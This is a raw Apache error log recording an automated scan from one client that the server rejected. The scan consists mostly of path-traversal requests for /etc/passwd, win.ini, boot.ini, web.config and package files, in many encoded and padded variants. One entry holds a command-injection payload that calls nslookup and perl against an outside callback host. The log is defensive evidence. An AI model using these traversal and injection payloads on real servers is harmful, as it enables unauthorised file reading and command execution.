[Tue Dec 02 09:49:15.401377 2025] [core:error] [pid 44166] [client 148.113.214.89:63841] AH00126: Invalid URI in request GET /icons/../../Gemfile HTTP/1.1
[Tue Dec 02 09:49:15.613435 2025] [core:error] [pid 45174] [client 148.113.214.89:63872] AH00126: Invalid URI in request GET /assets/css/../../../web.config HTTP/1.1
[Tue Dec 02 09:49:16.665318 2025] [core:error] [pid 44574] [client 148.113.214.89:63880] AH00126: Invalid URI in request GET /assets/bower_components/Ionicons/../../../../../../../../etc/passwd HTTP/1.1
[Tue Dec 02 09:49:17.079290 2025] [core:error] [pid 44246] (36)File name too long: [client 148.113.214.89:63911] AH00036: access to /assets/;(nslookup hitixhcqkktsdd7886.bxss.me||perl -e "gethostbyname('hitixhcqkktsdd7886.bxss.me')")|(nslookup hitixhcqkktsdd7886.bxss.me||perl -e "gethostbyname('hitixhcqkktsdd7886.bxss.me')")&(nslookup hitixhcqkktsdd7886.bxss.me||perl -e "gethostbyname('hitixhcqkktsdd7886.bxss.me')")/jvectormap/jquery-jvectormap.css failed (filesystem path '/var/www/html/apigeo/assets/;(nslookup hitixhcqkktsdd7886.bxss.me||perl -e "gethostbyname('hitixhcqkktsdd7886.bxss.me')")|(nslookup hitixhcqkktsdd7886.bxss.me||perl -e "gethostbyname('hitixhcqkktsdd7886.bxss.me')")&(nslookup hitixhcqkktsdd7886.bxss.me||perl -e "gethostbyname('hitixhcqkktsdd7886.bxss.me')")')
[Tue Dec 02 09:49:17.558650 2025] [core:error] [pid 44257] [client 148.113.214.89:63934] AH00126: Invalid URI in request GET /assets/css/../../../package.json HTTP/1.1
[Tue Dec 02 09:49:17.563051 2025] [core:error] [pid 44166] [client 148.113.214.89:63923] AH00126: Invalid URI in request GET /icons/../../web.config HTTP/1.1
[Tue Dec 02 09:49:18.106466 2025] [core:error] [pid 44574] [client 148.113.214.89:63935] AH00126: Invalid URI in request GET /icons/../../package.json HTTP/1.1
[Tue Dec 02 09:49:18.366917 2025] [core:error] [pid 44669] [client 148.113.214.89:63945] AH00126: Invalid URI in request GET /assets/plugins/pace/../../../../Gemfile HTTP/1.1
[Tue Dec 02 09:49:18.465374 2025] [core:error] [pid 45207] [client 148.113.214.89:63948] AH00126: Invalid URI in request GET /assets/bower_components/Ionicons/../../../../../../../../windows/win.ini HTTP/1.1
[Tue Dec 02 09:49:18.950794 2025] [core:error] [pid 44257] [client 148.113.214.89:63960] AH00126: Invalid URI in request GET /icons/../../package-lock.json HTTP/1.1
[Tue Dec 02 09:49:19.767454 2025] [core:error] [pid 45173] [client 148.113.214.89:63973] AH00126: Invalid URI in request GET /assets/bower_components/../../../../../../../../etc/passwd HTTP/1.1
[Tue Dec 02 09:49:20.139794 2025] [core:error] [pid 44574] [client 148.113.214.89:64007] AH00126: Invalid URI in request GET /assets/bower_components/Ionicons/css/../../../../../Gemfile HTTP/1.1
[Tue Dec 02 09:49:20.941822 2025] [core:error] [pid 45173] [client 148.113.214.89:64023] AH00126: Invalid URI in request GET /assets/plugins/pace/../../../../web.config HTTP/1.1
[Tue Dec 02 09:49:21.773600 2025] [core:error] [pid 44169] [client 148.113.214.89:64052] AH00126: Invalid URI in request GET /assets/bower_components/../../../../../../../../windows/win.ini HTTP/1.1
[Tue Dec 02 09:49:22.123535 2025] [core:error] [pid 45207] [client 148.113.214.89:64068] AH00126: Invalid URI in request GET /assets/bower_components/Ionicons/css/../../../../../web.config HTTP/1.1
[Tue Dec 02 09:49:22.717856 2025] [core:error] [pid 44661] [client 148.113.214.89:64092] AH00126: Invalid URI in request GET /assets/bower_components/Ionicons/../../../../../../../../boot.ini HTTP/1.1
[Tue Dec 02 09:49:23.865670 2025] [core:error] [pid 45211] [client 148.113.214.89:64123] AH00126: Invalid URI in request GET /assets/plugins/pace/../../../../package.json HTTP/1.1
[Tue Dec 02 09:49:24.401754 2025] [core:error] [pid 44746] [client 148.113.214.89:64144] AH00126: Invalid URI in request GET /assets/plugins/pace/../../../../package-lock.json HTTP/1.1
[Tue Dec 02 09:49:24.452420 2025] [core:error] [pid 45173] [client 148.113.214.89:64155] AH00126: Invalid URI in request GET /assets/bower_components/Ionicons/css/../../../../../package.json HTTP/1.1
[Tue Dec 02 09:49:24.674407 2025] [core:error] [pid 44314] [client 148.113.214.89:64159] AH00126: Invalid URI in request GET /assets/css/../../../package-lock.json HTTP/1.1
[Tue Dec 02 09:49:25.366935 2025] [core:error] [pid 44069] [client 148.113.214.89:64170] AH00126: Invalid URI in request GET /assets/bower_components/Ionicons/css/../../../../../package-lock.json HTTP/1.1
[Tue Dec 02 09:49:26.294833 2025] [core:error] [pid 45121] [client 148.113.214.89:64198] AH00126: Invalid URI in request GET /assets/bower_components/font-awesome/css/../../../../../../../../etc/passwd HTTP/1.1
[Tue Dec 02 09:49:27.275089 2025] [core:error] [pid 44318] [client 148.113.214.89:64239] AH00126: Invalid URI in request GET /assets/bower_components/font-awesome/css/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../etc/passwd HTTP/1.1
[Tue Dec 02 09:49:27.871234 2025] [core:error] [pid 44746] [client 148.113.214.89:64286] AH00126: Invalid URI in request GET /assets/bower_components/../../../../../../../../boot.ini HTTP/1.1
[Tue Dec 02 09:49:28.256344 2025] [core:error] [pid 44069] [client 148.113.214.89:64241] AH00126: Invalid URI in request GET /icons/../../../Gemfile HTTP/1.1
[Tue Dec 02 09:49:28.358372 2025] [core:error] [pid 44661] [client 148.113.214.89:64228] AH00126: Invalid URI in request GET /assets/bower_components/jvectormap/../../../../../../../../etc/passwd HTTP/1.1
[Tue Dec 02 09:49:28.810503 2025] [core:error] [pid 44989] [client 148.113.214.89:64310] AH00126: Invalid URI in request GET /assets/bower_components/font-awesome/css/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../windows/win.ini HTTP/1.1
[Tue Dec 02 09:49:29.069912 2025] [core:error] [pid 45173] [client 148.113.214.89:64306] AH00126: Invalid URI in request GET /assets/bower_components/font-awesome/css/../../../../../../../../windows/win.ini HTTP/1.1
[Tue Dec 02 09:49:29.111476 2025] [core:error] [pid 44314] [client 148.113.214.89:64321] AH00126: Invalid URI in request GET /icons/../../../web.config HTTP/1.1
[Tue Dec 02 09:49:29.657335 2025] [core:error] [pid 44246] [client 148.113.214.89:64323] AH00126: Invalid URI in request GET /icons/../../../package.json HTTP/1.1
[Tue Dec 02 09:49:29.668426 2025] [core:error] [pid 44069] [client 148.113.214.89:64345] AH00126: Invalid URI in request GET /../../../../../../../../boot.ini HTTP/1.1
[Tue Dec 02 09:49:29.774969 2025] [core:error] [pid 44746] [client 148.113.214.89:64341] AH00126: Invalid URI in request GET /assets/bower_components/jvectormap/../../../../../../../../windows/win.ini HTTP/1.1
[Tue Dec 02 09:49:30.176113 2025] [core:error] [pid 44661] [client 148.113.214.89:64347] AH00126: Invalid URI in request GET /icons/../../../package-lock.json HTTP/1.1
[Tue Dec 02 09:49:31.154715 2025] [core:error] [pid 45173] [client 148.113.214.89:64367] AH00126: Invalid URI in request GET /assets/bower_components/bootstrap/dist/css/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../etc/passwd HTTP/1.1
[Tue Dec 02 09:49:32.915452 2025] [core:error] [pid 45168] [client 148.113.214.89:64361] AH00126: Invalid URI in request GET /assets/bower_components/font-awesome/css/../../../../../../../../boot.ini HTTP/1.1
[Tue Dec 02 09:49:33.448005 2025] [core:error] [pid 45198] [client 148.113.214.89:64466] AH00126: Invalid URI in request GET /assets/plugins/pace/../../../../../Gemfile HTTP/1.1
[Tue Dec 02 09:49:33.699693 2025] [core:error] [pid 44227] [client 148.113.214.89:64470] AH00126: Invalid URI in request GET /assets/bower_components/bootstrap/../../../../../../../../etc/passwd HTTP/1.1
[Tue Dec 02 09:49:34.087617 2025] [core:error] [pid 45221] [client 148.113.214.89:64500] AH00126: Invalid URI in request GET /../../../../../../../../etc/passwd%C0%80.jsp HTTP/1.1
[Tue Dec 02 09:49:34.840186 2025] [core:error] [pid 45211] [client 148.113.214.89:64531] AH00126: Invalid URI in request GET /assets/bower_components/Ionicons/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini HTTP/1.1
[Tue Dec 02 09:49:35.620567 2025] [core:error] [pid 44169] [client 148.113.214.89:64560] AH00126: Invalid URI in request GET /assets/bower_components/bootstrap/dist/css/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../windows/win.ini HTTP/1.1
[Tue Dec 02 09:49:36.325550 2025] [core:error] [pid 45221] [client 148.113.214.89:64579] AH00126: Invalid URI in request GET /assets/css/skins/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../etc/passwd HTTP/1.1
[Tue Dec 02 09:49:36.780920 2025] [core:error] [pid 44227] [client 148.113.214.89:64592] AH00126: Invalid URI in request GET /assets/bower_components/font-awesome/../../../../../../../../etc/passwd HTTP/1.1
[Tue Dec 02 09:49:36.924315 2025] [core:error] [pid 45198] [client 148.113.214.89:64616] AH00126: Invalid URI in request GET /assets/bower_components/Ionicons/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1
[Tue Dec 02 09:49:36.946978 2025] [core:error] [pid 44707] [client 148.113.214.89:64597] AH00126: Invalid URI in request GET /assets/plugins/pace/../../../../../web.config HTTP/1.1
[Tue Dec 02 09:49:37.216319 2025] [core:error] [pid 45121] [client 148.113.214.89:64620] AH00126: Invalid URI in request GET /assets/css/skins/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../windows/win.ini HTTP/1.1
[Tue Dec 02 09:49:37.558074 2025] [core:error] [pid 45207] [client 148.113.214.89:64635] AH00126: Invalid URI in request GET /../../../../../../../../windows/win.ini%C0%80.jsp HTTP/1.1
[Tue Dec 02 09:49:38.151891 2025] [core:error] [pid 44661] [client 148.113.214.89:64648] AH00126: Invalid URI in request GET /assets/bower_components/jvectormap/../../../../../../../../boot.ini HTTP/1.1
[Tue Dec 02 09:49:38.680719 2025] [core:error] [pid 45210] [client 148.113.214.89:64658] AH00126: Invalid URI in request GET /assets/bower_components/Ionicons/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
[Tue Dec 02 09:49:38.714985 2025] [core:error] [pid 45121] [client 148.113.214.89:64678] AH00126: Invalid URI in request GET /assets/bower_components/bootstrap/../../../../../../../../windows/win.ini HTTP/1.1
[Tue Dec 02 09:49:39.120108 2025] [core:error] [pid 45221] [client 148.113.214.89:64679] AH00126: Invalid URI in request GET /icons/../../../../Gemfile HTTP/1.1
[Tue Dec 02 09:49:39.273112 2025] [core:error] [pid 44610] [client 148.113.214.89:64685] AH00126: Invalid URI in request GET /assets/bower_components/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini HTTP/1.1
[Tue Dec 02 09:49:39.875812 2025] [core:error] [pid 44246] [client 148.113.214.89:64708] AH00126: Invalid URI in request GET /assets/plugins/pace/../../../../../package.json HTTP/1.1
[Tue Dec 02 09:49:40.855464 2025] [core:error] [pid 44257] [client 148.113.214.89:64747] AH00126: Invalid URI in request GET /assets/css/../../../../Gemfile HTTP/1.1
[Tue Dec 02 09:49:40.993093 2025] [core:error] [pid 44259] [client 148.113.214.89:64752] AH00126: Invalid URI in request GET /assets/bower_components/font-awesome/../../../../../../../../windows/win.ini HTTP/1.1
[Tue Dec 02 09:49:42.033482 2025] [core:error] [pid 44707] [client 148.113.214.89:64785] AH00126: Invalid URI in request GET /assets/plugins/pace/../../../../../package-lock.json HTTP/1.1
[Tue Dec 02 09:49:42.588303 2025] [core:error] [pid 44259] [client 148.113.214.89:64804] AH00126: Invalid URI in request GET /assets/css/../../../../web.config HTTP/1.1
[Tue Dec 02 09:49:42.662263 2025] [core:error] [pid 45207] [client 148.113.214.89:64817] AH00126: Invalid URI in request GET /assets/bower_components/Ionicons/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini HTTP/1.1
[Tue Dec 02 09:49:43.119655 2025] [core:error] [pid 44245] [client 148.113.214.89:64815] AH00126: Invalid URI in request GET /assets/bower_components/jvectormap/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../etc/passwd HTTP/1.1
[Tue Dec 02 09:49:43.161475 2025] [core:error] [pid 45198] [client 148.113.214.89:64807] AH00126: Invalid URI in request GET /assets/bower_components/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1
[Tue Dec 02 09:49:43.954975 2025] [core:error] [pid 45207] [client 148.113.214.89:64860] AH00126: Invalid URI in request GET /assets/bower_components/Ionicons/css/../../../../../../../../etc/passwd HTTP/1.1
[Tue Dec 02 09:49:44.066563 2025] [core:error] [pid 44259] [client 148.113.214.89:64859] AH00126: Invalid URI in request GET /assets/bower_components/jvectormap/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../windows/win.ini HTTP/1.1
[Tue Dec 02 09:49:44.573038 2025] [core:error] [pid 44169] [client 148.113.214.89:64889] AH00126: Invalid URI in request GET /assets/bower_components/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
[Tue Dec 02 09:49:45.218204 2025] [core:error] [pid 45174] [client 148.113.214.89:64894] AH00126: Invalid URI in request GET /assets/css/../../../../package.json HTTP/1.1
[Tue Dec 02 09:49:45.228157 2025] [core:error] [pid 45296] [client 148.113.214.89:64898] AH00126: Invalid URI in request GET /icons/../../../../web.config HTTP/1.1
[Tue Dec 02 09:49:45.568259 2025] [core:error] [pid 44169] [client 148.113.214.89:64922] AH00126: Invalid URI in request GET /assets/bower_components/font-awesome/css/../../../../../../../../etc/passwd%C0%80.jsp HTTP/1.1
[Tue Dec 02 09:49:45.801197 2025] [core:error] [pid 45210] [client 148.113.214.89:64939] AH00126: Invalid URI in request GET /assets/bower_components/bootstrap/dist/../../../../../../../../etc/passwd HTTP/1.1
[Tue Dec 02 09:49:45.861317 2025] [core:error] [pid 45173] [client 148.113.214.89:64940] AH00126: Invalid URI in request GET /assets/bower_components/font-awesome/../../../../../../../../boot.ini HTTP/1.1
[Tue Dec 02 09:49:46.723391 2025] [core:error] [pid 45174] [client 148.113.214.89:64957] AH00126: Invalid URI in request GET /icons/../../../../package.json HTTP/1.1
[Tue Dec 02 09:49:46.986497 2025] [core:error] [pid 44245] [client 148.113.214.89:64962] AH00126: Invalid URI in request GET /assets/bower_components/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini HTTP/1.1
[Tue Dec 02 09:49:47.166730 2025] [core:error] [pid 44574] [client 148.113.214.89:64988] AH00126: Invalid URI in request GET /assets/css/../../../../package-lock.json HTTP/1.1
[Tue Dec 02 09:49:47.211857 2025] [core:error] [pid 45296] [client 148.113.214.89:64990] AH00126: Invalid URI in request GET /assets/bower_components/bootstrap/../../../../../../../../boot.ini HTTP/1.1
[Tue Dec 02 09:49:47.309379 2025] [core:error] [pid 45210] [client 148.113.214.89:64994] AH00126: Invalid URI in request GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini HTTP/1.1
[Tue Dec 02 09:49:47.839289 2025] [core:error] [pid 45303] [client 148.113.214.89:65011] AH00126: Invalid URI in request GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1
[Tue Dec 02 09:49:47.919700 2025] [core:error] [pid 44245] [client 148.113.214.89:65015] AH00126: Invalid URI in request GET /icons/../../../../package-lock.json HTTP/1.1
[Tue Dec 02 09:49:48.704954 2025] [core:error] [pid 44245] [client 148.113.214.89:65054] AH00126: Invalid URI in request GET /assets/bower_components/bootstrap/dist/../../../../../../../../windows/win.ini HTTP/1.1
[Tue Dec 02 09:49:48.867467 2025] [core:error] [pid 45174] [client 148.113.214.89:65036] AH00126: Invalid URI in request GET /assets/bower_components/font-awesome/css/../../../../../../../../windows/win.ini%C0%80.jsp HTTP/1.1
[Tue Dec 02 09:49:50.807284 2025] [core:error] [pid 45168] [client 148.113.214.89:65079] AH00126: Invalid URI in request GET /assets/bower_components/Ionicons/css/../../../../../../../../windows/win.ini HTTP/1.1
[Tue Dec 02 09:49:51.851996 2025] [core:error] [pid 45312] [client 148.113.214.89:65084] AH00126: Invalid URI in request GET /assets/bower_components/jvectormap/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini HTTP/1.1
[Tue Dec 02 09:49:52.097374 2025] [core:error] [pid 44069] [client 148.113.214.89:65146] AH00126: Invalid URI in request GET /assets/css/skins/........................................................................../../../../../../../../etc/passwd HTTP/1.1
[Tue Dec 02 09:49:52.286723 2025] [core:error] [pid 45168] [client 148.113.214.89:65160] AH00126: Invalid URI in request GET /assets/bower_components/bootstrap/dist/../../../../../../../../boot.ini HTTP/1.1
[Tue Dec 02 09:49:52.537677 2025] [core:error] [pid 44257] [client 148.113.214.89:65137] AH00126: Invalid URI in request GET /assets/bower_components/jvectormap/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1
